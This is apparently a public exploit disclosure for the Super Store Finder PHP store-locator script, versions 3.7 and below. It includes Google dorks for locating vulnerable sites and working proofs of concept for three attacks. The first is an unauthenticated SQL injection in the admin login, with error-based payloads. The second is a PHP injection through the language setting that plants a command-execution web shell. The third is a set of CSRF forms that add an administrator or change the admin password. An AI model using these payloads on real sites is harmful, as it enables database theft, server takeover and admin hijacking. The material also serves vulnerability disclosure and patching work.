@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 .:. Exploit Title > SuperStoreFinder - Multiple Vulnerabilities

.:. Google Dorks .:.
"designed and built by Joe Iz."
"Super Store Finder is designed and built by Joe Iz from Highwarden Huntsman."
inurl:/superstorefinder/index.php

.:. Date: 0ctober 13, 2023
.:. Exploit Author: bRpsd
.:. Contact: cy[at]live.no
.:. Vendor -> https://www.superstorefinder.net/
.:. Product -> https://codecanyon.net/item/super-store-finder/3630922
.:. Product Version -> [3.7 and below]
.:. DBMS -> MySQL
.:. Tested on > macOS [*nix Darwin Kernel], on local xampp
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@


 #############
 |DESCRIPTION|
 #############
"Super Store Finder is a multi-language fully featured PHP/Javascript/MySQL store locator script integrated with the latest Google Maps API that allows customers to locate your stores easily. Packed with great features such as Geo Location, Drag and Drop Marker, Bulk Import and Geo code, Google Street View, Google Maps Direction and it is customizable and stylable (with extensible themes/add-ons, custom colors and maps design using snazzymaps.com). The store finder will be able to list nearby stores / outlets around your web visitors from nearest to the furthest distance away. Your customers will never be lost again getting to your stores / locations"






Vulnerability 1: Unauthenticated SQL Injection
Types: boolean-based blind,error-based, time-based blind
File: localhost/admin/index.php
Vul Parameter: USERNAME [POST]

===========================================================================================
Vulnerability 1: Unauthenticated SQL Injection
Types: boolean-based blind,error-based, time-based blind
File: localhost/admin/index.php
Vul Parameter: USERNAME [POST]



Test #1

http://localhost:9000/adminstorefinder/admin/index.php

username=a'&password=1&btn_login=Login

Response Error:
Array
(
    [0] => Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin''' at line 1
)
SELECT users.* FROM users WHERE users.username='admin''
===========================================================================================

Test #2 => Payload (Proof Of Concept)

http://localhost:9000/adminstorefinder/admin/index.php

username=a' AND GTID_SUBSET(CONCAT(0x7162766b71,(SELECT (CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END)),0x7170707071),3239)-- Seaj
&password=1&btn_login=Login


Response Error:
Array
(
    [0] => Invalid query: FUNCTION adminstorefinder.JSON_STORAGE_FREE does not exist
)
===========================================================================================



======================================================================================================================================================================================
Vulnerability 2: Authenticated PHP Injection - Remote Code Exectuion
File: localhost/admin/settings.php
Vul Parameter: language_set [POST]


Proof of concept:
http://localhost:9000/superstorefinder/admin/settings.php
langset=en_US&language_set=en_US');!isset($_GET['cmd'])?:system($_GET['cmd']);//&distance_set=mi&init_zoom=0&zoomhere_zoom=0&geo_settings=0&default_location=New York, US&style_map_color=rgba(0,0,0,1)&style_map_code=94102&style_top_bar_bg=rgba(0,0,0,1)&style_top_bar_font=rgba(0,0,0,1)&style_top_bar_border=rgba(0,0,0,1)&style_results_bg=rgba(0,0,0,1)&style_results_hl_bg=rgba(0,0,0,1)&style_results_hover_bg=rgba(0,0,0,1)&style_results_font=rgba(0,0,0,1)&style_results_distance_font=rgba(0,0,0,1)&style_distance_toggle_bg=rgba(0,0,0,1)&style_contact_button_bg=rgba(0,0,0,1)&style_contact_button_font=rgba(0,0,0,1)&style_button_bg=rgba(0,0,0,1)&style_button_font=rgba(0,0,0,1)&style_list_number_bg=rgba(0,0,0,1)&style_list_number_font=rgba(0,0,0,1)&save=1


Index.php included in the config.inc.php , we just can go for rce
with GET parameter ?cmd=


http://localhost:9000/?cmd=uname -a

Reponse:
22.2.0 Darwin Kernel Version 22.2.0: Fri Nov 11 02:08:47 PST 2022; root:xnu-8792.61.2~4/RELEASE_X86_64 x86_64
===========================================================================================




===========================================================================================
Vulnerability 3: Cross Site Request Forgery
Risk: It can lead to Privilege Escalation through adding admins or changing admin password.
Affected Files (1): localhost/superstorefinder/admin/users_add.php
Parameters: username,password,cpassword

Proof of concept:
<iframe style="display:none" name="CSRF"></iframe>
    <form method='POST' action='http://localhost:9000/superstorefinder/admin/users_add.php' target="CSRF" id="CSRF">
      <input name="submit_hidden" value="submit_hidden" type="hidden" />
      <input type='hidden' name='username' value='X'>
        <input type='hidden' name='password' value='123'>
      <input type='hidden' name='cpassword' value='123'>
      <input type='hidden' value='submit'>
    </form>
    <script>document.getElementById("CSRF").submit()</script>
      <iframe src='http://localhost:9000/superstorefinder/admin/logout.php' width='0' height='0'></iframe>




Affected Files (2:):localhost/superstorefinder/admin/change_password.php
Parameters: password,cpassword,save

Proof of concept:
<iframe style="display:none" name="CSRF"></iframe>
    <form method='POST' action='http://localhost:9000/superstorefinder/admin/users_add.php' target="CSRF" id="CSRF">
      <input type='hidden' name='password' value='123'>
        <input type='hidden' name='cpassword' value='123'>
      <input type='hidden' name="save=" value='save'>
    </form>
    <script>document.getElementById("CSRF").submit()</script>
      <iframe src='http://localhost:9000/superstorefinder/admin/logout.php' width='0' height='0'></iframe>
    ======================================================================================